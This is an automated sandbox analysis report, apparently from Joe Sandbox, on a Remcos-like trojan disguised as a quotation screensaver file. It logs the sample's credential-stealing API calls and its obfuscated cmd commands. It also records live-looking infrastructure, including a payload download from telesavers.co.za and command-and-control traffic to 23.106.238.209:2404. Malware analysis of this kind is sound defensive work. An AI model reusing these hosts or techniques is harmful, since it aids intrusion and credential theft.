                Source: Yara match, File source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Source: z1Quotation.scr.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 137_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,137_2_00404423

                Compliance

                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Unpacked PE file: 140.2.z1Quotation.scr.exe.400000.0.unpack
                Source: z1Quotation.scr.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49760 version: TLS 1.2
                Source: z1Quotation.scr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\Projects\VS2005\BrowsingHistoryView\Release\BrowsingHistoryView.pdb source: z1Quotation.scr.exe
                Source: Binary string: D:\qb\workspace\23788\source\audio_codec\HDAudioDrv\x64\DAudRelease\IntcDAud.pdb source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 0_2_00405B60 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405B60
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 0_2_00406731 FindFirstFileA,FindClose,0_2_00406731
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 0_2_004027AF FindFirstFileA,0_2_004027AF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 137_2_0040AE51 FindFirstFileW,FindNextFileW,137_2_0040AE51
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 138_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,138_2_00407EF8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 139_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,139_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 140_2_004098C4 FindFirstFileW,FindNextFileW,140_2_004098C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, Code function: 146_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,146_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, File opened: C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, File opened: C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, File opened: C:\Users\user\AppData\Local\Temp\hhsvynxt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, File opened: C:\Users\user\
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, File opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe, File opened: C:\Users\user\AppData\Local\

                Networking

                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49764 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49763 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49761 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49769 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49770 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49767 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49768 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49771 -> 23.106.238.209:2404
                Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49774 -> 23.106.238.209:2404
                Source: global traffic TCP traffic: 192.168.11.20:49761 -> 23.106.238.209:2404
                Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                Source: Joe Sandbox View IP Address: 178.237.33.50
                Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US
                Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49762 -> 178.237.33.50:80
                Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49760 -> 102.65.21.26:443
                Source: global traffic HTTP traffic detected: GET /FrKSUMZ203.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: telesavers.co.za Cache-Control: no-cache
                Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: z1Quotation.scr.exe String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: z1Quotation.scr.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: global traffic DNS traffic detected: DNS query: telesavers.co.za
                Source: global traffic DNS traffic detected: DNS query: subddfg.lol
                Source: global traffic DNS traffic detected: DNS query: geoplugin.net
                Source: z1Quotation.scr.exe, z1Quotation.scr.exe, 00000000.00000000.32405926725.000000000040A000.00000008.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000082.00000000.32835780083.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: z1Quotation.scr.exe, 00000000.00000000.32405926725.000000000040A000.00000008.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000082.00000000.32835780083.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: z1Quotation.scr.exe String found in binary or memory: http://www.ebuddy.com
                Source: z1Quotation.scr.exe String found in binary or memory: http://www.imvu.com
                Source: z1Quotation.scr.exe String found in binary or memory: http://www.nirsoft.net/
                Source: z1Quotation.scr.exe String found in binary or memory: https://login.yahoo.com/config/login
                Source: z1Quotation.scr.exe String found in binary or memory: https://www.google.com
                Source: z1Quotation.scr.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknown HTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49760 version: TLS 1.2
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 0_2_00405620 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405620
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 137_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,137_2_0040987A
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 137_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,137_2_004098E2
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 138_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,138_2_00406DFC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 138_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,138_2_00406E9F
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 139_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,139_2_004068B5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 139_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,139_2_004072B5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_004082FF EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,140_2_004082FF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_00408367 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,140_2_00408367
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 146_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,146_2_004068B5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 146_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,146_2_004072B5
                Source: C:\Windows\SysWOW64\dxdiag.exe Windows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll

                E-Banking Fraud

                Source: Yara matchFile source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Source: Conhost.exeProcess created: 96

                System Summary

                Source: initial sampleStatic PE information: Filename: z1Quotation.scr.exe
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess Stats: CPU usage > 6%
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00401806 NtdllDefWindowProc_W,137_2_00401806
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004018C0 NtdllDefWindowProc_W,137_2_004018C0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004016FD NtdllDefWindowProc_A,138_2_004016FD
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004017B7 NtdllDefWindowProc_A,138_2_004017B7
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00402CAC NtdllDefWindowProc_A,139_2_00402CAC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00402D66 NtdllDefWindowProc_A,139_2_00402D66
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00409ED0 NtQuerySystemInformation,NtQuerySystemInformation,140_2_00409ED0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00409F44 memset,CreateFileW,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,CloseHandle,140_2_00409F44
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00402CAC NtdllDefWindowProc_A,146_2_00402CAC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00402D66 NtdllDefWindowProc_A,146_2_00402D66
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004034D1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034D1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413DCE appears 48 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00414060 appears 50 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00414A64 appears 78 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413CE8 appears 58 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00423B2E appears 43 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413D0C appears 36 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413D18 appears 42 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348
                Source: z1Quotation.scr.exeBinary or memory string: OriginalFileName vs z1Quotation.scr.exe
                Source: z1Quotation.scr.exeBinary or memory string: OriginalFilename vs z1Quotation.scr.exe
                Source: unknownDriver loaded: C:\Windows\System32\drivers\mstee.sys
                Source: z1Quotation.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@410/33@14/3
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,137_2_004182CE
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004034D1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034D1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,139_2_00410DE1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,146_2_00410DE1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004048D0 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004048D0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,137_2_00413D4C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00402178 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_00402178
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,137_2_0040B58D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ZLUOGZ
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1412
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsx806F.tmp
                Source: z1Quotation.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSystem information queried: HandleInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: z1Quotation.scr.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: z1Quotation.scr.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: z1Quotation.scr.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: z1Quotation.scr.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: z1Quotation.scr.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: z1Quotation.scr.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: z1Quotation.scr.exeVirustotal: Detection: 18%
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile read: C:\Users\user\Desktop\z1Quotation.scr.exe
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_138-33208
                Source: unknownProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
